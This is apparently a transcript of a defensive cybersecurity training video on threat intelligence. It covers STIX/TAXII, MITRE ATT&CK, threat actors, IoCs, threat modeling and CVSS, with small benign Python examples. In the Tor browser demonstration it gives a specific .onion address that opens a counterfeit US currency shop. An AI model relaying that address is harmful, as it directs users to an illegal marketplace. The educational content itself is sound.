Then there's the Center for Internet Security. This is another nonprofit organization whose purpose is really to provide IT security information to technicians. [Video description begins] Center for Internet Security has
been abbreviated to CIS. [Video description ends] Then there's the National Institute of Standards and
Technology, or NIST. The NIST has a lot of different standards documentation. Not all of them are related to
security. But NIST does have a cybersecurity framework available.
And finally, we've got the Open Source Security Information Management, or OSSIM, as another intelligence source. This is really a collection of tools designed for security professionals that relate to IT security and intrusion detection.
Now from your own network environment, which includes cloud deployments, there are plenty of sources for
IT security intelligence that are customized to your environment. It really comes in the form of things like
server logs; user device logs, such as from smartphones; network device logs; cloud service logs; past incident
reports; public and private entities that might have access to your network and logs related to that type of
activity; captured network traffic; vulnerability assessments that might be conducted periodically to identify
weaknesses in your environment; penetration test results which are used to exploit discovered vulnerabilities;
and finally, IT security audit reports. All of these provide a wealth of information.
But this is only going to be very useful if it's compiled and analyzed centrally, so that we have some kind of a
tool that can analyze the data looking for indicators of compromise. The logs in and of themselves are useless
unless we use them in a specific manner. Now there are a couple of different IT security intelligence data
formats that are standard in the industry, one of which is called STIX, S-T-I-X. The other is called TAXII, T-
A-X-I-I.
Let's start with STIX. This stands for Structured Threat Information eXpression. And it deals with storing
information about threat actors and incidents that have occurred as well as indicators of compromise and also
the tactics employed by adversaries to run attacks; so it has details about exploits. It's a common language that's
used to describe cybersecurity threats. Now it also involves information about taking a course of action to
mitigate those threats.
TAXII stands for Trusted Automated eXchange of Indicator Information. Now this is a method of exchanging
cybersecurity data that's been formatted, for example, using the STIX format. So we have a number of different mechanisms, then, that we can use to learn about threats so we can reduce their impact, to document information about them, and then to exchange that information to help other organizations and individuals.
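To give a feel for what STIX-formatted threat data looks like, here is a minimal Python sketch that builds a dictionary shaped like a STIX 2.1 indicator object and prints it as JSON. The hash value and identifier are placeholders invented for illustration, and a real implementation would more likely use a dedicated STIX library.

```python
import json
from datetime import datetime, timezone

now = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")

# A minimal STIX 2.1-style indicator: the pattern says "flag any file whose
# SHA-256 matches this known-malicious hash" (hash and UUID are placeholders).
indicator = {
    "type": "indicator",
    "spec_version": "2.1",
    "id": "indicator--00000000-0000-4000-8000-000000000000",
    "created": now,
    "modified": now,
    "name": "Known malware file hash",
    "pattern": "[file:hashes.'SHA-256' = 'aaaa...']",
    "pattern_type": "stix",
    "valid_from": now,
}

print(json.dumps(indicator, indent=2))
```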
In this video, learn how to use the MITRE ATT&CK knowledge base.
Objectives
Effective IT security specialists are up-to-date with the latest threats and tactics and techniques used by
adversaries to compromise systems and exfiltrate sensitive data. Now one source is the attack.mitre.org
website. [Video description begins] The website has a menu bar, which includes the following menus: Tactics,
Techniques, Mitigations, etc. [Video description ends]
As it says on the landing page, this is a globally-accessible knowledge base of adversary tactics and techniques
based on real-world observations. This is an absolute wealth of information. If this is not something that you've spent some time on, you need to allocate time to spend here. This will help you personally as you build your career within the IT security field. But it will also help the organization you are working with to prevent and counter attacks.
So the first thing we might look at here on the MITRE ATT&CK website is to go under Tactics. So we can
look at PRE-ATT&CK. PRE-ATT&CK would be reconnaissance type of items. And we see a lot of directions
related to this. So first of all, we see PRE-ATT&CK Tactics.
[Video description begins] The PRE-ATT&CK web page that opens displays a PRE-ATT&CK Tactics table
with the following columns: ID, Name, and Description. Several tactic name links are listed in the table. Also,
the page includes a PRE-ATT&CK drop-down menu in the navigation pane. The menu contains the following
categories: Priority Definition Planning, Target Selection, Technical Information Gathering, etc. [Video
description ends]
And on the left, we have a navigator; keeps changing as we navigate through the site. For example, if I were to
click on Target Selection, we see some details related to selecting an attack vector for a target victim network
or host. [Video description begins] The "Target Selection" category includes a "Techniques" table with the
following columns: ID, Name, and Description. A few technique name links, including Determine
approach/attack vector, are listed in the table, [Video description ends]
We also see Technical Information Gathering. If I click that and scroll down, things like Conduct active
scanning to send transmissions to end nodes to see who responds. And then to further perhaps dig deeper, to
see if there are any vulnerabilities present on those devices that can be exploited. [Video description
begins] The "Technical Information Gathering" category includes a "Techniques" table with the following
columns: ID, Name, and Description. Several technique name links, including Conduct active scanning, are
listed in the table, . [Video description ends]
Then we've got Techniques and Mitigations. [Video description begins] The presenter points to the
"Techniques" menu and the "Mitigations" menu in the menu bar. [Video description ends]
So down here, we can see there are techniques. And again over on the left, we've got a change in navigation
bar. So let's say, Lateral Movement within the network. [Video description begins] The "Lateral Movement"
category includes a "Techniques" table with the following columns: ID, Name, and Description. Several
technique name links, including Exploitation of Remote Services, are listed in the table. [Video description
ends]
So it explains lateral movement and some of the techniques that have been observed out in the wild, so to
speak, as to how this has been done. So by exploiting remote services, we can dig deeper and learn more about
that.
Now we can also go here under Techniques and this time I'll choose Mobile as opposed to Enterprise – so
mobile technologies. As we go through here, we can see we've got a lot of items listed. Again, it's kind of
categorized on the left in the same way. So let's say, Command and Control. Here it talks about what command
and control, or C and C, is all about and the techniques used by malicious users to further their cause when it
comes to infiltrating malware on devices so that they can create a botnet. In other words, the bots or the
infected devices report back periodically to command and control servers to retrieve commands on what they
should do.
Of course, we've also got Mitigations at the top – very important. So if we go at the Enterprise level, for
example, the first thing we see here is Account Use Policies. Configure features related to account use like
login attempt lockouts, specific login times that should be allowed in your organization. A lot of this is
hardening strategy. [Video description begins] On the Mitigations menu, when he clicks Enterprise, the page
that opens includes an "Enterprise Mitigations" table with the following columns: ID, Name, and Description.
Several enterprise mitigation name links, including Account Use Policies, are listed in the table. [Video
description ends]
So if I click on Account Use Policies, we can see more details related to that and the techniques that are
addressed by mitigation such as brute forcing – password attacks against user accounts. We've also got the
Groups here. [Video description begins] With him selecting the Groups option, the page that opens contains
the following categories in the navigation pane: Overview, APT1, Gallmaker, etc. Currently, Overview is
selected. [Video description ends]
These are groups of known malicious users. For example, if I click APT1, it says here that it's a Chinese threat group that has been attributed to a number of attacks. And we can scroll down to learn more about that. So we've got an entire list here on the left of known threat groups around the world. We can click on any one of them to learn more about them. Gallmaker, for example, is a cyberespionage group that has targeted victims in the Middle East since 2017.
And we can scroll down and learn about that. As I'm sure you can see, it's absolutely crucial to spend some time here to learn about tactics, techniques, and mitigations, as well as looking at blog entries. [Video description
begins] When he selects the Blog option from the menu bar, a new "MITRE ATT&CK - Medium" tab opens in
the web browser. [Video description ends]
Now when you look at the blog entries, you'll see that there are a lot of interesting items available here such as
launching ATT&CK for ICS, Industrial Control Systems. [Video description begins] He selects the
"Launching ATT&CK for ICS" blog post. [Video description ends] Because there's been a spike in the interest
for this in past years. And then, of course, it can ask us to log in using third-party providers, which I will not
do. So there's a real wealth of information that all IT security specialists should spend some time on if they've
not spent time here already.
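MITRE also publishes the ATT&CK knowledge base as machine-readable STIX bundles in its CTI repository on GitHub. The Python sketch below, which assumes that repository layout is still current and that the requests package is installed, pulls the Enterprise bundle and prints a few technique names.

```python
import requests

# The MITRE CTI GitHub repository publishes ATT&CK as STIX bundles; this raw
# URL reflects the repository layout at the time of writing and may change.
URL = ("https://raw.githubusercontent.com/mitre/cti/master/"
       "enterprise-attack/enterprise-attack.json")

bundle = requests.get(URL, timeout=60).json()

# Techniques are represented as "attack-pattern" objects in the bundle.
techniques = [obj for obj in bundle["objects"] if obj.get("type") == "attack-pattern"]
print(f"{len(techniques)} techniques loaded")
for technique in techniques[:5]:
    print("-", technique.get("name"))
```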
[Video description begins] Topic title: Intelligence Collection. Your host for this session is Dan
Lachance. [Video description ends]
Threat intelligence collection is a lot more than simply reviewing the latest security threats from security
websites online. It also involves looking inside at your own network environment and the logs collected from it
and then analyzing it. So this means that we want to collect this threat intelligence so that we can minimize the
impact of realized threats should they occur. Threat intelligence collection is also important, so we can predict
future attacks where possible. It also feeds into proactively planning for incident response should those threats
be realized.
And a big part of this these days is machine learning, often simply abbreviated as ML. Now this means
analyzing vast amounts of data from different sources – in other words, big data. So we might gain a lot of
insight by compiling historical security incident information together in conjunction with current threat
information, maybe, specific to your industry and then running machine learning against it to look for
indicators of compromise or looking at the likelihood of that threat being realized in your specific
environment.
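As one hedged example of what "running machine learning against it" could look like in practice, the sketch below uses scikit-learn's IsolationForest to flag hosts whose log-derived features look unlike the rest. The feature values, failed-login counts and outbound traffic volumes, are invented for illustration.

```python
from sklearn.ensemble import IsolationForest

# Each row is one host: [failed logins per day, outbound megabytes per day].
# These numbers are invented; in practice they would come from your logs.
features = [
    [2, 120], [1, 95], [3, 110], [2, 130], [1, 100],
    [40, 5200],   # an outlier that might indicate compromise
]

model = IsolationForest(contamination=0.1, random_state=42)
labels = model.fit_predict(features)  # -1 = anomaly, 1 = normal

for row, label in zip(features, labels):
    status = "ANOMALY" if label == -1 else "normal"
    print(row, status)
```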
Now the first order of business with threat intelligence collection is to determine which threats must be
mitigated. That's only going to be possible after you've done what we've just previously discussed – when
you've taken a look at intelligence sources and run analytics against them to see which threats are the most likely.
Because that's where you want to spend resources. So then we'll know which threats need to be mitigated, after
which we can start collecting data related to that.
So maybe if we're looking at threats related to network distributed denial-of-service attacks, we could look at
logs on individual hosts for indications that malware might have been planted on those devices or that routers
might have been probed from the public-facing Internet. We can also look at our incident response plan to deal
with those situations. And again, we can also collect data from public sources about known adversary tactics
that might be used, let's say, in executing a distributed denial-of-service attack.
The next thing we have to think about is processing that collected data. Now processing data in this aspect
really means formatting it appropriately or filtering out the noise for things that are not relevant. In order to
filter out what's not relevant or what's normal, you have to have established a baseline of what's normal. Then
it's pretty easy to know what is not normal.
After analyzing the data in detail, because we filtered it already, we can then configure our machine learning
tools or it might be done automatically to look for indicators of compromise. An example of this might be the
fact that we've got the presence of new Linux hosts on the network that weren't there previously. And we didn't
even use Linux.
The next thing is to disseminate or share those findings and then have feedback on them, which feeds back into
the original question of which threats must be mitigated. This is an ongoing cycle, not a one-time activity. And one
of the ways that you can deal with the machine learning to go through these vast amounts of data looking for
indicators of compromise is to use machine learning services available through the cloud. That way you don't
have to acquire and configure all the underlying infrastructure to allow for that large-scale data analysis.
[Video description begins] Topic title: Classifying Threats. Your host for this session is Dan Lachance. [Video
description ends]
Security technicians have limited time to make an impact on reducing threats against the organization. And
classifying threats is one of the ways to save even more time, because classifying threats lets you prioritize those threats that will have the largest likely impact and then focus on mitigating them.
So there are varying types of damage impacts that we have to consider. That would include things such as
leaked trade secrets or the compromising of customer financial records if we're in that type of business or
perhaps the leakage of national security secrets from the government level or even data files that get encrypted
on user devices with ransomware. And also we have to think about the damage that might be related to a
compromise through remote access to critical infrastructure networks related to electricity, water, or aviation.
So needless to say, classifying threats is a big deal. So we focus our energy where it's needed the most.
The cyber kill chain is really a reference to looking at some kind of a compromise or attack from beginning to
end. So starting at the reconnaissance techniques that might have been used by attackers initially and then
tracing the techniques that were used to compromise a system or to execute some kind of an attack. [Video
description begins] The following information is displayed on screen: Trace system/data compromise
techniques. [Video description ends]
And then we can learn a lot from this so that we can anticipate and mitigate future attacks of a similar nature. Classifying threats will result in categories like known threats. Now classifying a threat as known usually
means that we have either documented it through our own log analysis or that it's already known by other
cyberintelligence sources that we subscribe to.
Unknown threats are called zero-day threats. Now a zero-day is a serious issue because it often means that
there is an exploit that can be used, let's say, to break into an operating system and the operating system vendor
isn't even aware of it yet or there is no fix for it. As you might imagine, on the dark net, zero-day exploits are
worth a lot of money for malicious users.
Other threats would include denial-of-service, DoS, or distributed denial-of-service, D-D-o-S or DDoS,
attacks. A DoS attack is simply anything that can render a service unusable for legitimate purposes by
legitimate users. That could even include something as unsophisticated as unplugging the power for a server
physically. A DDoS is a little bit different. Where the 'distributed' comes in is that we've got a number of
computers that are normally infected with malware under singular malicious user control that can be given
commands, for example, to flood a target network with useless traffic.
Then we've got advanced persistent threats, or APTs. Now this one is interesting because an advanced
persistent threat essentially means that we've got a compromise that's been used to gain access to a system or
an entire network, that goes unnoticed for a period of time. Now think back to 2017 as related to the Equifax
data security breach where, reportedly, there were more than 140 million American consumers that had their
credit history compromised in some way. Now this was related to an Apache web server component flaw that
was exploited.
And what's interesting about this is that the attackers were able to get into the Equifax environment in March
of 2017. However, the attackers were able to stay in the network undetected for more than 70 days. Now this was an exploit that was known out on the Internet and there were notifications or advisories that were sent out. It simply means that Equifax had not applied the fix to this Apache flaw. So
classifying threats is going to be important then so that we know where to focus our energy on the most likely
of threats.
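One simple way to act on this kind of classification is to score each threat by estimated likelihood and impact and work the list from the top. The Python sketch below is only illustrative; the threat names and scores are invented.

```python
# Hypothetical threats scored 1-5 for likelihood and impact.
threats = [
    {"name": "Phishing-delivered ransomware", "likelihood": 5, "impact": 4},
    {"name": "Zero-day in public web app", "likelihood": 2, "impact": 5},
    {"name": "DDoS against storefront", "likelihood": 3, "impact": 3},
]

# Rank by a simple risk score: likelihood multiplied by impact.
for t in sorted(threats, key=lambda t: t["likelihood"] * t["impact"], reverse=True):
    print(t["likelihood"] * t["impact"], t["name"])
```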
Upon completion of this video, you will be able to recognize different sources and motivations for IT threats.
Objectives
[Video description begins] Topic title: Threat Actor Types. Your host for this session is Dan Lachance. [Video
description ends]
An important aspect of minimizing the impact of a realized threat is to be aware of threat actors. Threat actors
are the entities that are responsible for a security incident, whether it's a malware infection or a DDoS attack.
Whether that incident was intentional or not does not matter. The fact remains that the entity is still a threat.
They present some kind of a risk.
Now there are many different types of threat actors, including hacktivists and insiders within the organization.
Hacktivists try to promote some kind of an ideology, whether it's based on a political agenda or religious. Now
normally, they do not attempt to hide their activities; they're not stealthy. An example of a hacktivist type of attack might be a DDoS attack or website defacement to get their message known, to
get their message across, or taking over social media accounts to control the feeds.
An insider threat could be either intentional, such as with a disgruntled employee. But often, it's unintentional,
such as with users clicking attachments in phishing e-mail messages or users plugging in USB storage devices
that are infected with malware. And so now that malware is on the inside and might even potentially spread
over the network if it's a worm type of malware.
Other threat actors would include organized crime and nation states. Organized crime has a large reach over the Internet to potential victims. It's also relatively low risk for them because there are many ways to make an
anonymous connection, especially through the dark net or the dark web. So it becomes very difficult, if not
impossible, for law enforcement to trace the origin of this kind of organized crime activity.
Then there's the payment side. If some kind of cryptocurrency like Bitcoin is used as a payment, it becomes
very difficult to trace those transactions. [Video description begins] The following information is displayed on
screen: Untraceable payment (Bitcoin cryptocurrency). [Video description ends]
Nation state means that the threat actor is supported by some kind of a government – it's government funded.
And usually, the target is another government or some kind of national activity that the primary government is
not in agreement with. Consider some examples of nation-state-sponsored attacks, so from a nation-state threat actor. You might remember, back in 2010, the Stuxnet worm that allegedly was designed by the United States and Israel against Iranian nuclear enrichment plants, specifically for uranium enrichment. The Stuxnet worm was designed to look for a specific model of Siemens equipment controlling the centrifuges, essentially to destroy them.
Then there's the alleged U.S. attack that disabled Iranian weapon systems in 2020. So none of these have been
proven. But it still brings to mind that there could be some well-funded nation state type of attacks that are
motivated by governments in one country going after governments in another country.
[Video description begins] Topic title: The Darknet. Your host for this session is Dan Lachance. [Video
description ends]
When most people think of the Internet, they think of what they get through their news feeds, through their
social media feeds, and what they can search for and get results on using their favorite search engine. Truth is
the Internet is much, much larger than that. The dark net or the dark web is a part of the Internet that you can
access anonymously.
You can make anonymous communications through the Tor network. This is one way to do it. Tor, T-o-r,
stands for the onion router. And it's part of an anonymous way to access content on the Internet, where
cryptocurrencies are used to pay for illegal products and services. Now bear in mind, when you are on the dark
net or the dark web, you can still use tools to access legitimate standard websites you might access normally.
But you also potentially could access some scary stuff.
Now the dark net or dark web has content: web pages that are not indexed or crawled by popular search
engines like Google or Bing or Baidu if you're in China searching for content. So because the content isn't
readily available, it's a little bit harder to get at. And on the dark web, many users will use pseudonyms. They
won't use their real names because they want to remain anonymous. [Video description begins] The following
information is displayed on screen: Dark web users use pseudonyms. [Video description ends]
Now there are many illegal items and services available on the dark web, like credit card dumps. These are
collections of stolen credit card information for sale to the highest bidder. There are also botnet and hacker
service rentals. A botnet is a collection of computers under singular malicious user control. And you can rent
out a botnet for a period of time. Or you can rent the services of a hacker to execute some kind of an attack.
This is possible.
You can also acquire forged documents, including passports or drivers' licenses. You can also acquire drugs,
illegal drugs; weapons; child pornography. You can even hire assassins. It sounds unbelievable, but
it's all absolutely available on the dark web. Now the Silk Road is a good example of the dark web. It existed
online from 2011 to 2013. And we have a screenshot here that talks about accessing the site by using the Tor
web browser.
Now when you use the Tor web browser, you access very-difficult-to-remember URLs. So not friendly names
like www.buyguns.com. It would never be that easy. So you have unindexed or unsearchable content. So you
have to dig quite a bit to find specific items on the dark net. But the Silk Road was a site where you could buy
drugs and weapons and so on. Essentially, it was a black market available on the Internet. Buyers and sellers,
of course, have to deal with payments, and that was often done using cryptocurrencies like Bitcoin.
Now the dark net and the dark web, as you might imagine, have many usages, some of them nasty – drugs and illegal file sharing – but also censorship bypass. Now think about using, for example, Facebook if you're a Chinese citizen residing
within China. Now Facebook and Facebook Messenger are blocked by the so-called Chinese Great Firewall
that filters content and access to certain apps.
However, you could use censorship bypass. In other words, you could use the Tor network to make a
connection to resources that are normally unavailable, such as Facebook from within China. So it really serves
another purpose, which would be citizen protection from state surveillance regardless of whether you're in the
United States, Canada, Europe, China, India. It doesn't matter where you are. But that is a legitimate way to
use the dark net or dark web. It's not always about the bad stuff although the bad stuff certainly does exist.
Another great way that the dark net or dark web can be used is through journalism, to send encrypted
communications for news stories. And also whistleblowing. So there are many different ways that the dark net
or dark web can be used. Like most things in life, how we use it determines whether it's bad or good.
[Video description begins] Topic title: The Tor Web Browser. Your host for this session is Dan
Lachance. [Video description ends]
The Tor web browser is but one tool that you can use to access resources on the dark net or the dark web, as
well as on the standard Internet that is indexed by standard search engines like Google and Bing. So here, I've
gone to torproject.org/download. I'm just doing this using a regular browser, in this case, Google Chrome.
And down below, I can download the installer for Windows, for macOS X, for Linux, or for Android devices.
So we've got a lot of listings here that are available and a lot of details as we scroll down the web page. So I'm
going to go ahead and download and install the Tor web browser for the Windows platform. Now the first time
you launch the Tor browser, it's going to make an anonymous connection to the Tor network. So it's just like
having a regular web browser. [Video description begins] A web browser titled "Tor Browser" opens. [Video
description ends]
And if you type in a standard site like www.cnn.com, standard sites will work. However, on the Tor network,
bear in mind that you're going to be connecting to a lot of difficult-to-remember URLs that will only work
when you're connected to the Tor network and nowhere else. Here we can see that the CNN website indeed did
pop up okay in the Tor web browser. Let me just paste in another URL here. [Video description begins] The
presenter pastes the following URL: qkj4drtgvpm7eed.onion. [Video description ends]
It's a strange-looking URL. We'll give it a moment to load the page. And it pops up a page here for counterfeit
US dollars currency. And that sounds illegal. Well, it would be. But let's try that same URL in a normal web
browser like Google Chrome. Here in Google Chrome, try as I may, when I enter in that URL, it doesn't know
what I'm talking about. Because I'm not connected to the Tor network when I use a standard browser like
Chrome. [Video description begins] The information that the web browser displays includes the following:
This site can't be reached. [Video description ends]
So the thing to watch out for is when you are using the Tor Browser and you are connected to the dark net, be
very careful what you look at or what you click on. Because there is some stuff there that's illegal that could
land you in trouble. So beware.
discuss true positives and negatives as well as false positives and negatives
[Video description begins] Topic title: Threat Positives and Negatives. Your host for this session is Dan
Lachance. [Video description ends]
As a security technician, you will have to constantly deal with threats. Now threat positives and negatives are
the result of having tools in place that can alert you as to whether something bad is happening or not. So we're
talking here about false positives, true positives, false negatives, and true negatives. Now knowing when to
take action or to respond on alerts is key in saving time and solving security problems quickly.
Let's talk about each of these in more detail. So we've got threat positives and threat negatives. The first kind of positive is a false positive. This means that we've got a benign item or activity that is incorrectly identified as malicious. So the tool positively says there's a security incident here when, in fact, there is not. Hence, false positive. Now this wastes IT system and personnel time.
A true positive means that we've got correctly identified malicious items such as malware or activity such as
suspicious network spikes on the network and it triggers an alert. So that is when our intrusion detection and
prevention systems, for example, are working well. And it's important to tweak the specific solutions that you
use to identify threats so that you minimize false positives. Again, it's a waste of time.
Now then we've got negatives. A false negative means that we've got a configuration that does not detect
malicious items or activity. [Video description begins] The following information is displayed on screen:
Current configuration does not detect malicious item/activity. [Video description ends] Now let's think about
that. That means that we might have had some kind of attack that occurred but we didn't in our configuration
have a way for it to be detected. So hence, false negative. It did not detect malicious items or activity.
A true negative means that we aren't getting any alerts since there are no problematic or security conditions
that are present. So it's important to be able to know the difference between these positives and negatives.
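A small worked example may help keep these four outcomes straight. Given counts of each outcome from an alerting tool (the numbers below are made up), you can compute how often an alert is actually worth acting on.

```python
# Hypothetical counts from reviewing a month of IDS alerts.
true_positives = 40    # real attacks that triggered alerts
false_positives = 160  # benign activity that triggered alerts
false_negatives = 10   # real attacks that triggered no alert
true_negatives = 9790  # benign activity correctly ignored

precision = true_positives / (true_positives + false_positives)
detection_rate = true_positives / (true_positives + false_negatives)
false_positive_rate = false_positives / (false_positives + true_negatives)

print(f"Only {precision:.0%} of alerts were real incidents")
print(f"{detection_rate:.0%} of real attacks were detected")
print(f"False positive rate: {false_positive_rate:.2%}")
```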
Now what can we do to eliminate false positives, because we've already identified the fact that it's a waste of
time and security technicians are busy enough as it is? Well, one way to reduce false positives is to take all of the data sources that you might use for intrusion detection – server and mobile device logs and intrusion sensor logs out on the network – and feed that data into a central location, such as the cloud, where data analysis and machine learning are applied to those data sets. From there, anything that's filtered out as unimportant is just white noise; you don't worry about it. But any incidents that are raised can be made available through centralized monitoring systems such as a SIEM, S-I-E-M, system.
Now the way that this is going to work to be effective is to not look at individual events from your data sources
such as server logs but rather a correlation of events over time that might point to suspicious or anomalous
activity. You can't decide what's anomalous until you first decide what's normal. You need to establish a
baseline of normalcy in your environment in order for this to truly be effective.
So data correlation then will add context to a potential security event. This means we end up with less wasted
IT system resources and less wasted personnel time on things like false positives. This way, we can have our
IT technicians focus more on actual malicious activity that poses a threat to the organization.
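To make the baseline idea concrete, here's a minimal Python sketch that establishes a baseline from hypothetical hourly failed-login counts and only raises an alert when an observation deviates well beyond it – one simple way to cut down on false positives:

from statistics import mean, stdev

# Hypothetical hourly failed-login counts collected while the environment was behaving normally.
baseline_counts = [3, 5, 2, 4, 6, 3, 5, 4, 2, 3, 5, 4]
threshold = mean(baseline_counts) + 3 * stdev(baseline_counts)

# New observations fed in from the centralized data sources (also hypothetical).
observed = {"09:00": 4, "10:00": 5, "11:00": 41}

for hour, count in observed.items():
    if count > threshold:
        print(f"{hour}: {count} failed logins - above baseline threshold {threshold:.1f}, raise an alert")
    else:
        print(f"{hour}: {count} failed logins - within baseline, treat as white noise")

A real SIEM correlates many event types over time, but the principle is the same: normal has to be defined before anomalous can be flagged.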
[Video description begins] Topic title: Threat Indications. Your host for this session is Dan Lachance. [Video
description ends]
To effectively protect an organization from IT security threats, we need to have a way to have reliable threat
indications. These are called Indicators of Compromise, or IoCs. An Indicator of Compromise is an event or
even a correlation of events outside of normal host or network behavior that are detected after they have
occurred. And so, to determine what's abnormal, you have to establish a baseline of what is normal.
Configuring any type of intrusion detection or prevention system is going to require effort on the part of the IT
security team. It's not just a one-size-fits-all solution that you plug into the network and away we go. You can
do that but it won't be as effective as it otherwise could be. It needs to be customized for your environment so
that it knows what's normal. So IoCs then can be used to improve malware and attack activity detection and
how the IT security teams respond when those threats are realized.
Examples of Indicators of Compromise, or IoCs, might include login during irregular hours. For that to be
figured out, the system has to know what's regular. Also, unauthorized devices on the network. Well, to know
that, your solution is going to have to have a sense of what normally should be on the network.
Abnormal network traffic spikes or CPU utilization. You know where I'm going with that. You have to
establish what's normal for network traffic and CPU utilization. And unusual network traffic patterns such as
large bulk amounts of messages sent from internally out to an outside URL over port 443 in the middle of the
night. That could be an indication of a botnet compromise where the infected bots are talking to the command
and control server through port 443. Although it doesn't have to be that port. That's just an example.
And so it's important to document your indicators of compromise. This is important both within and outside of
the organization. It allows sharing of known threats. It can help others within your organization and outside of
it with incident response and containment and, of course, eradication. So really, it's documentation and sharing.
And there are standards for this that we've mentioned, such as Structured Threat Information Expression,
STIX, and also the exchange of that represented security threat information through Trusted Automated
Exchange of Indicator Information, otherwise called TAXII. [Video description begins] Structured Threat
Information Expression and Trusted Automated Exchange of Indicator Information have been abbreviated to
STIX and TAXII, respectively. [Video description ends] And there are many other ones, including the OpenIOC
framework. OpenIOC is simply a standard method of describing the result of analyzing malware.
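As a rough illustration of what documenting and sharing an IoC can look like, here's a minimal sketch assuming the open-source stix2 Python package, expressing the bulk port 443 traffic example as a STIX indicator:

from stix2 import Indicator

# Describe the suspected botnet command-and-control traffic as a shareable STIX 2.1 indicator.
indicator = Indicator(
    name="Possible botnet command and control traffic",
    description="Large volumes of outbound messages to an external URL over port 443 outside business hours",
    pattern="[network-traffic:dst_port = 443]",
    pattern_type="stix",
)

# The serialized JSON is the kind of content that would typically be exchanged over a TAXII server.
print(indicator.serialize(pretty=True))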
[Video description begins] Topic title: Threat Modeling. Your host for this session is Dan Lachance. [Video
description ends]
Threat modeling begins with identifying threats, whether those are internal, within the organization, or
external. From there, we can then look at the threat likelihood and the impact that the threat would have on the
business. Now by prioritizing those with the highest impact, we then have more of a focal point for the threats
that we really need to apply countermeasures against. So we can implement the most feasibly effective threat
mitigation. So this is very important – to hunt down threats and then to model through these three steps – so
that we can focus on those threats that present the biggest risk.
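As a rough sketch of that prioritization step, each identified threat can be given a likelihood and impact rating, and the product used to rank where countermeasures should be applied first; the threats and ratings below are hypothetical:

# Hypothetical threats rated 1 (low) to 5 (high) for likelihood and business impact.
threats = [
    {"name": "Phishing against finance staff", "likelihood": 4, "impact": 4},
    {"name": "Unpatched web server exploit",   "likelihood": 3, "impact": 5},
    {"name": "Lost unencrypted USB drive",     "likelihood": 2, "impact": 3},
]

for threat in threats:
    threat["score"] = threat["likelihood"] * threat["impact"]

# Highest score first - these are the threats to apply countermeasures against first.
for threat in sorted(threats, key=lambda t: t["score"], reverse=True):
    print(f"{threat['score']:>2}  {threat['name']}")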
Now questions that we would have to ask would be things like, who are the potential attackers? In other words,
who are the threat actors? The other thing, what do the attackers want? Are they looking simply to break into a
corporate network and deface a website? Are they looking at financial gain through stealing credit card
numbers? What are they after?
The other one is, how will they attack? So what will they do? Will they run vulnerability scans? Well, that's
usually the first part of reconnaissance to discover weaknesses. That's actually what happened in the 2017
Equifax data security breach. And the next item to consider is, how can the attack be mitigated? Well, that
would include things like hardening – by making sure that the latest patches are kept up with so that we can
close out any potential vulnerabilities that might be exploited by attackers.
With threat modeling, you need to identify assets that need to be protected – whether it's a customer database,
which you might have replicas of distributed in different parts of the world. You have to look at the functional
requirements of the organization's business processes, such as the customer relationship management tools that
you might run on-premises or in the cloud.
The business objectives need to be identified. Now the business objectives are important because any IT
solutions that are in use need to align with business objectives. Otherwise, we're wasting time and resources on
IT solutions that don't serve the interests of the organization. Then there's compliance with regulations. And
also at the software development level, with threat modeling, developers need to apply a security mindset to all
phases of the Software Development Life Cycle, or SDLC – from the initial design phases all the way through
to the coding and the testing and the eventual deployment of the solution.
There are many tools out there that you can use to actually work with GUI threat modeling, such as the
OWASP Threat Dragon project. Now this is free. Everything from OWASP, the Open Web Application
Security Project, is free and open-source. This is a threat modeling tool that you can use as a standalone
desktop app in Windows, Linux, and the Mac OS.
[Video description begins] Topic title: Common Vulnerability Scoring System. Your host for this session is
Dan Lachance. [Video description ends]
The Common Vulnerability Scoring System, otherwise called CVSS, is important for IT security professionals
because it provides a way to allocate or assign a score to a vulnerability. The higher the score, the bigger the
threat and thus it allows technicians to prioritize one threat over another. One implementation of this is the
National Vulnerability Database, or NVD.
Here, I've gone to nvd.nist.gov/vuln, for vulnerabilities. [Video description begins] The NVD website has the
following categories in the navigation pane: General, Vulnerabilities, Vulnerability Metrics, etc. [Video
description ends] Now with Vulnerabilities on the left, I can click the plus sign to expand that. [Video
description begins] The expanded "Vulnerabilities" category contains the following subcategories: Search &
Statistics, Full Listing, Categories, etc. [Video description ends]
And I could look at a Full Listing or Categories. So let's start with Full Listing. [Video description begins] The
"Full Listing" web page that opens displays several years. And displayed below each of the years are the links
to the corresponding months. [Video description ends] Now we can choose a specific month; let's say, January
of 2020. And here we have a lot of CVEs. [Video description begins] The "January 2020" web page that
opens includes several CVE links. [Video description ends]
Now CVE stands for Common Vulnerabilities and Exposures. And each of them has a number. And if I click on
one of these CVE items for January of 2020, it gives me a description. In this case, it's related to a cross-site
scripting, or XSS, vulnerability in a specific web app component. And as we go down below, we can see the
severity – that's the result of the Common Vulnerability Scoring System here – has been set at 5.4. So it's a
medium type of threat. And down below, we have a lot of references, including links, to advisories and even in
some cases patches that can be applied to close that vulnerability.
Now let's go back in our web browser. We were looking at the vulnerabilities part of NVD. We're looking at
the Full Listing. But I can expand with the plus sign under Vulnerabilities and choose other items like
Categories. So if we take a look at the categories, then we can scroll down and start to take a look at different
aspects of threats that we might be interested in, such as Authentication Bypass by Spoofing.
[Video description begins] The NVD CWE Slice web page that opens includes a table with the following
columns: Name, CWE-ID, and Description. Several records appear in the table. These include CWE-290, with
CWE-ID listed as the "Authentication Bypass by Spoofing" link. [Video description ends]
I'm just going to go back under Vulnerabilities again, and this time I'll choose Search & Statistics. Sometimes
you don't have the time to scroll through everything. You just need to find out something about a particular
component or protocol or setting.
[Video description begins] The "Search Vulnerability Database" web page that opens includes a "Search
Type" heading, a "Results Type" heading, a "Keyword Search" Search box, a "Search Type" heading, and a
"Search" button. The "Search Type" heading has two options: Basic and Advanced. Basic is selected. The
"Results Type" heading has two options: Overview and Statistics. Overview is selected. The "Search Type:"
heading has three options: All Time, Last 3 Months, and Last 3 Years. All Time is selected. [Video description
ends]
So let's say, I look for remote desktop protocol, RDP. So this normally listens on port 3389 to allow remote
GUI management of the Windows hosts. And I want to look for remote desktop protocol issues, let's say, in the
last three months. [Video description begins] After typing "remote desktop protocol" in the "Keyword Search"
Search box, the presenter selects the "Last 3 Months" option under the "Search Type" heading. [Video
description ends]
So I'll click Search. And we can see that, well, immediately the CVSS, the Common Vulnerability Scoring
System, severity here is at a high, okay, at least for version 3.1. [Video description begins] The "Search
Results" page that opens includes a table with the following columns: Vuln ID, Summary, and CVSS Severity.
